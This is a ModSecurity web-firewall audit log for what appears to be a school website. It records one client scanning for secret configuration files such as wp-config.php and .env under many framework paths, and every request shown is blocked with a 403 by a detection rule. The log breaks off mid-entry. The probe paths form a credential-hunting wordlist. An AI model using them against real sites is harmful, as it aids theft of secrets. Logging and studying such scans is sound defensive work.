--019c4565-A-- [24/May/2025:18:06:20 +0700] aDGoLDvI5DIWBJ2mFG5N7gAAANA 103.236.140.4 56322 103.236.140.4 8181 --019c4565-B-- GET /wp-config.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 155.94.172.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 155.94.172.112 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --019c4565-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --019c4565-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748084780373400 757 (- - -) Stopwatch2: 1748084780373400 757; combined=264, p1=233, p2=0, p3=0, p4=0, p5=31, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --019c4565-Z-- --94bafc70-A-- [24/May/2025:18:06:25 +0700] aDGoMeunkxaVeh4NwhbTkgAAAEg 103.236.140.4 56482 103.236.140.4 8181 --94bafc70-B-- GET /flask/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 155.94.172.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 155.94.172.112 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --94bafc70-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --94bafc70-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748084785538039 842 (- - -) Stopwatch2: 1748084785538039 842; combined=336, p1=295, p2=0, p3=0, p4=0, p5=40, sr=71, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --94bafc70-Z-- --dc53763b-A-- [24/May/2025:18:06:25 +0700] aDGoMTvI5DIWBJ2mFG5OAAAAAM0 103.236.140.4 56484 103.236.140.4 8181 --dc53763b-B-- GET /config/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 155.94.172.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 155.94.172.112 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --dc53763b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dc53763b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748084785538092 968 (- - -) Stopwatch2: 1748084785538092 968; combined=406, p1=357, p2=0, p3=0, p4=0, p5=48, sr=86, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dc53763b-Z-- --0c354454-A-- [24/May/2025:18:06:25 +0700] aDGoMTvI5DIWBJ2mFG5OAQAAANA 103.236.140.4 56486 103.236.140.4 8181 --0c354454-B-- GET /symfony/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 155.94.172.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 155.94.172.112 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --0c354454-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0c354454-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748084785539606 512 (- - -) Stopwatch2: 1748084785539606 512; combined=190, p1=168, p2=0, p3=0, p4=0, p5=22, sr=50, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0c354454-Z-- --810bcd35-A-- [24/May/2025:18:06:25 +0700] aDGoMeO2UzDOKMmK0i6k6AAAAAo 103.236.140.4 56488 103.236.140.4 8181 --810bcd35-B-- GET /next/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 155.94.172.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 155.94.172.112 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --810bcd35-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --810bcd35-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748084785542468 682 (- - -) Stopwatch2: 1748084785542468 682; combined=271, p1=241, p2=0, p3=0, p4=0, p5=29, sr=61, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --810bcd35-Z-- --d89dd92d-A-- [24/May/2025:18:06:25 +0700] aDGoMTvI5DIWBJ2mFG5OAgAAAMw 103.236.140.4 56490 103.236.140.4 8181 --d89dd92d-B-- GET /.env.local HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 155.94.172.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 155.94.172.112 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --d89dd92d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d89dd92d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748084785542551 752 (- - -) Stopwatch2: 1748084785542551 752; combined=222, p1=180, p2=0, p3=0, p4=0, p5=41, sr=54, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d89dd92d-Z-- --63a06c28-A-- [24/May/2025:18:06:25 +0700] aDGoMTvI5DIWBJ2mFG5OAwAAAMY 103.236.140.4 56492 103.236.140.4 8181 --63a06c28-B-- GET /api/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 155.94.172.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 155.94.172.112 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --63a06c28-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --63a06c28-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748084785546493 602 (- - -) Stopwatch2: 1748084785546493 602; combined=222, p1=194, p2=0, p3=0, p4=0, p5=28, sr=55, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --63a06c28-Z-- --3a0c103e-A-- [24/May/2025:18:06:25 +0700] aDGoMeunkxaVeh4NwhbTlAAAAFc 103.236.140.4 56496 103.236.140.4 8181 --3a0c103e-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 155.94.172.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 155.94.172.112 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --3a0c103e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3a0c103e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748084785546598 675 (- - -) Stopwatch2: 1748084785546598 675; combined=273, p1=237, p2=0, p3=0, p4=0, p5=35, sr=59, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3a0c103e-Z-- --71372348-A-- [24/May/2025:18:06:25 +0700] aDGoMTvI5DIWBJ2mFG5OBAAAANY 103.236.140.4 56512 103.236.140.4 8181 --71372348-B-- GET /django/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 155.94.172.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 155.94.172.112 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --71372348-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --71372348-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748084785774907 813 (- - -) Stopwatch2: 1748084785774907 813; combined=298, p1=259, p2=0, p3=0, p4=0, p5=39, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --71372348-Z-- --53e9b304-A-- [24/May/2025:18:06:25 +0700] aDGoMeunkxaVeh4NwhbTlgAAAFg 103.236.140.4 56514 103.236.140.4 8181 --53e9b304-B-- GET /.env.production HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 155.94.172.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 155.94.172.112 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --53e9b304-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --53e9b304-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748084785859155 868 (- - -) Stopwatch2: 1748084785859155 868; combined=317, p1=273, p2=0, p3=0, p4=0, p5=44, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --53e9b304-Z-- --cc63725f-A-- [24/May/2025:18:06:25 +0700] aDGoMTvI5DIWBJ2mFG5OBQAAAM4 103.236.140.4 56516 103.236.140.4 8181 --cc63725f-B-- GET /nuxt/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 155.94.172.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 155.94.172.112 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --cc63725f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cc63725f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748084785864518 825 (- - -) Stopwatch2: 1748084785864518 825; combined=330, p1=290, p2=0, p3=0, p4=0, p5=40, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cc63725f-Z-- --0128d019-A-- [24/May/2025:18:06:25 +0700] aDGoMfmzt4abyoi_U9kAdQAAAIY 103.236.140.4 56522 103.236.140.4 8181 --0128d019-B-- GET /react/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 155.94.172.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 155.94.172.112 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --0128d019-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0128d019-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748084785967215 742 (- - -) Stopwatch2: 1748084785967215 742; combined=269, p1=234, p2=0, p3=0, p4=0, p5=35, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0128d019-Z-- --0753dc32-A-- [24/May/2025:18:06:25 +0700] aDGoMeunkxaVeh4NwhbTlwAAAE4 103.236.140.4 56526 103.236.140.4 8181 --0753dc32-B-- GET /.env.save HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 155.94.172.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 155.94.172.112 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --0753dc32-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0753dc32-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748084785974629 679 (- - -) Stopwatch2: 1748084785974629 679; combined=255, p1=223, p2=0, p3=0, p4=0, p5=32, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0753dc32-Z-- --ffbb1406-A-- [24/May/2025:18:06:25 +0700] aDGoMeunkxaVeh4NwhbTmAAAAEU 103.236.140.4 56528 103.236.140.4 8181 --ffbb1406-B-- GET /cp/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 155.94.172.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 155.94.172.112 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --ffbb1406-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ffbb1406-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748084785986406 689 (- - -) Stopwatch2: 1748084785986406 689; combined=269, p1=229, p2=0, p3=0, p4=0, p5=40, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ffbb1406-Z-- --078db733-A-- [24/May/2025:18:06:26 +0700] aDGoMuunkxaVeh4NwhbTmQAAAEs 103.236.140.4 56532 103.236.140.4 8181 --078db733-B-- GET /conf/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 155.94.172.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 155.94.172.112 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --078db733-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --078db733-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748084786076840 1000 (- - -) Stopwatch2: 1748084786076840 1000; combined=445, p1=384, p2=0, p3=0, p4=0, p5=60, sr=108, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --078db733-Z-- --4cd3f24a-A-- [24/May/2025:18:06:26 +0700] aDGoMuunkxaVeh4NwhbTmgAAAE8 103.236.140.4 56534 103.236.140.4 8181 --4cd3f24a-B-- GET /core/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 155.94.172.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 155.94.172.112 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --4cd3f24a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4cd3f24a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748084786078351 573 (- - -) Stopwatch2: 1748084786078351 573; combined=216, p1=187, p2=0, p3=0, p4=0, p5=29, sr=55, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4cd3f24a-Z-- --5ff0d858-A-- [24/May/2025:18:06:26 +0700] aDGoMjvI5DIWBJ2mFG5OBgAAANI 103.236.140.4 56536 103.236.140.4 8181 --5ff0d858-B-- GET /server/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 155.94.172.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 155.94.172.112 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --5ff0d858-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5ff0d858-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748084786082049 719 (- - -) Stopwatch2: 1748084786082049 719; combined=274, p1=242, p2=0, p3=0, p4=0, p5=32, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5ff0d858-Z-- --1a37dd3f-A-- [24/May/2025:18:06:26 +0700] aDGoMjvI5DIWBJ2mFG5OBwAAANU 103.236.140.4 56538 103.236.140.4 8181 --1a37dd3f-B-- GET /crm/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 155.94.172.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 155.94.172.112 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --1a37dd3f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1a37dd3f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 